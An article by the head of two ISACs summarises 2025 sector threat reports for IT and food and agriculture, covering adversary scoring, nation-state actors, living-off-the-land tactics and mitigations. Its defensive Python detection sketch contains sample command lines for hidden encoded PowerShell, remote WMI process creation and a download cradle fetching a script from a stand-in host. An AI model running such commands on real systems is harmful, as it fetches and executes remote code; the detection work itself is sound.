From cloud architecture to the global food supply, no sector is immune to the evolving sophistication of cyber threats. The findings from both the IT-ISAC's and the Food and Ag-ISAC's recently released 2025 sector cyber threat reports reveal a reality in which companies in every sector face persistent adversaries, ranging from state-sponsored actors to coordinated cybercrime. These reports also demonstrate how technical shifts by adversaries and rising global tensions together create an increasingly complex threat environment for every organization, regardless of industry.
Assessing Risk: The PASS Framework
To better understand the threat landscape and pinpoint high-risk threat actors, both ISACs utilize the Predictive Adversary Scoring System (PASS). Developed in collaboration with ISAC members and partners, PASS transforms raw intelligence into a priority list. It evaluates adversaries based on how recently they have been active, how frequently they target specific sectors, the complexity of their technical methods, and their primary motivations, assigning them a score from 0 to 100. This data-driven approach allows organizations to identify and focus on the actors most likely to pose a credible threat to their specific business.
The 2025 Threat Landscape at a Glance
Not surprisingly, the 2025 data shows that threat actors are active across multiple sectors. Analysts identified 77 active adversaries in the IT sector and 72 active adversaries in the food and agriculture sector. Many of these actors overlap across sectors, but their impact and scores may differ because of differences in motivation, frequency of attacks, and focus on targeting vulnerabilities in specific products and services.
Leading the threat profile are high-capability nation-state actors, most notably the Lazarus Group, which ranks first in both sectors, with scores of 89.0 (IT) and 84.0 (food and agriculture). This group maintains a persistent presence to facilitate state-sponsored theft and cryptocurrency revenue.
While the IT sector frequently faces groups like Sandworm (84.0), which focus on geopolitical disruption, the food and agriculture sector is increasingly targeted by ransomware-focused entities like Qilin and Akira. Furthermore, the rise of hacktivist groups like Dark Engine (76.0) in the agricultural space indicates that the global food supply has become a stage for ideological conflict.
Geopolitics on the Digital Front Line
The origin of these threats suggests a map of global competition and conflict. Russia-based threat actors account for 48.4% of IT threats and a staggering 59.3% of food and agriculture threats. This ecosystem is a volatile mix of state-affiliated espionage and opportunistic ransomware gangs that use critical sectors as leverage for extortion.
China is home to the second-largest share of observed threat actors, accounting for 29% of IT threats and 25.4% of food and agriculture threats. Tactics here have notably shifted toward pre-positioning. Rather than immediate data theft, these actors embed themselves in telecommunications, cloud environments, and research networks to maintain long-term listening posts for future conflicts.
While Iran (11.3% in IT, 5.1% in food and agriculture) and North Korea (6.5% in IT, 6.8% in food and agriculture) host a smaller percentage of observed threat actors, these actors are highly capable and creative. Iranian actors are relentless in promoting the goals of the Iranian regime. While North Korean actors are most famous for using fraudulent remote-worker identities to bypass traditional perimeter security and provide financial resources to the North Korean regime, they also field a range of skilled state-sponsored actors.
Modern Tactics: The Rise of LOTL
One clear takeaway from both reports is the universal adoption of “living-off-the-land” (LOTL) techniques.
- 100% of identified adversaries in both sectors utilized native system tools such as PowerShell or WMI.
- Over 96% of observed actors across both industries modified existing malware to bypass traditional signature-based antivirus tools.
By using a computer’s own administrative tools, attackers blend in with legitimate traffic. This shift toward stealth is reflected in the high percentage of groups utilizing lengthy persistence and defense evasion (84.4% in IT and 94.4% in food and agriculture). Adversaries are prioritizing longevity over immediate disruption, often compromising third-party vendors – a tactic seen in roughly 80% of attacks in both sectors before a ransom is ever demanded.
Cultivating a Collective Defense
To counter a landscape defined by skill, stealth and persistence, organizations must strategically allocate their limited security resources to maximum effect. Based on actor behavior, the implementation of multi-factor authentication (MFA) remains a key mitigation. MFA creates a significant hurdle for attackers using stolen credentials.
Additionally, considering how attacks spread from corporate networks to operational environments, segmenting IT and operational technology (OT) environments can reduce risk. While there are business benefits to integrating IT with OT, from a security perspective, segmenting the networks ensures that a security breach in the corporate environment cannot migrate laterally to disrupt critical industrial control systems or production machinery. Companies should have a process to evaluate whether the security risk is worth the business benefit.
In addition, because attackers are hiding within legitimate tools, companies should increase monitoring for anomalous behavior. This does not mean that companies should stop looking for malicious files. However, traditional file-based detection approaches, while necessary, are no longer enough.
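As an added illustration (not code from either ISAC report), the following Python sketch shows what behavior-based monitoring of native tools can look like in practice: it scores constructed process-creation events against heuristics for the LOTL patterns the reports describe (PowerShell and WMI abuse) instead of looking for a known-bad file. The event fields, rule names and weights are assumptions chosen for the example.

```python
import re

# Constructed sample events modelled on Windows process-creation telemetry
# (parent process, launched image, command line). Not real data from the reports.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUJDRA=="},
    {"parent": "services.exe", "image": "wmic.exe",
     "cmdline": "wmic /node:fileserver01 process call create notepad.exe"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a.ps1')"},
]

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE", "POWERPNT.EXE"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Behavioral rules: (name, weight, predicate). Weights are illustrative assumptions;
# in a real deployment they would be tuned against the environment's baseline.
RULES = [
    ("office_parent_spawns_shell", 40,
     lambda e: e["parent"].upper() in OFFICE_APPS and e["image"].lower() in SHELLS),
    ("encoded_or_hidden_powershell", 30,
     lambda e: e["image"].lower() == "powershell.exe"
     and re.search(r"(?i)(^|\s)-(e|enc|encodedcommand|w\s+hidden)\b", e["cmdline"])),
    ("download_cradle", 35,
     lambda e: re.search(r"(?i)\b(IEX|Invoke-Expression)\b.*\b(DownloadString|"
                         r"Invoke-WebRequest|iwr)\b", e["cmdline"])),
    ("remote_wmi_process_create", 30,
     lambda e: e["image"].lower() == "wmic.exe"
     and re.search(r"(?i)/node:\S+.*process\s+call\s+create", e["cmdline"])),
]


def score_event(event):
    """Return (score, matched rule names); 0 means nothing anomalous was seen."""
    hits = [name for name, _, pred in RULES if pred(event)]
    score = min(100, sum(w for n, w, _ in RULES if n in hits))
    return score, hits


def triage(events, threshold=30):
    """Return (score, hits, event) for events at or above threshold, highest first."""
    flagged = [(*score_event(e), e) for e in events]
    flagged = [t for t in flagged if t[0] >= threshold]
    return sorted(flagged, key=lambda t: -t[0])


if __name__ == "__main__":
    for score, hits, event in triage(SAMPLE_EVENTS):
        print(score, hits, event["cmdline"])
```

The benign directory listing launched from the desktop scores zero, while the Office-spawned, hidden, encoded PowerShell instance is ranked highest; none of the four lines would trip a file hash check.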
Finally, companies are encouraged to maintain recoverable backups and to implement, maintain, and practice incident response plans. No company is immune, so every company must be prepared for the possibility that they will be a victim. How a company responds to a breach can determine whether the company survives the incident or goes out of business.
Ultimately, the 2026 landscape demonstrates that the threat environment is too complex for any organization to stand alone. By participating in a shared intelligence network, companies can turn individual insights into collective strength and informed decision making, making the global infrastructure more resilient against the evolving threats. Voluntary engagement with industry peers serves as a cost-effective supplement to internal security teams and helps strengthen the sector as a whole.
About the Author
Scott C. Algeier is the Founder, President, and CEO of cybersecurity consulting firm Conrad, Inc., Executive Director of the Information Technology – Information Sharing and Analysis Center (IT-ISAC), and Executive Director of the Food and Agriculture – Information Sharing and Analysis Center. He has spent the past twenty years at the intersection of cybersecurity policy and operations. Previously, Scott was Manager for Homeland Security at the U.S. Chamber of Commerce, where he coordinated the U.S. Chamber’s critical infrastructure protection, cybersecurity, and disaster management public policy initiatives. Scott earned his Master’s degree in International Relations and European Studies from the University of Kent (England) and is an honors graduate of Gettysburg College.

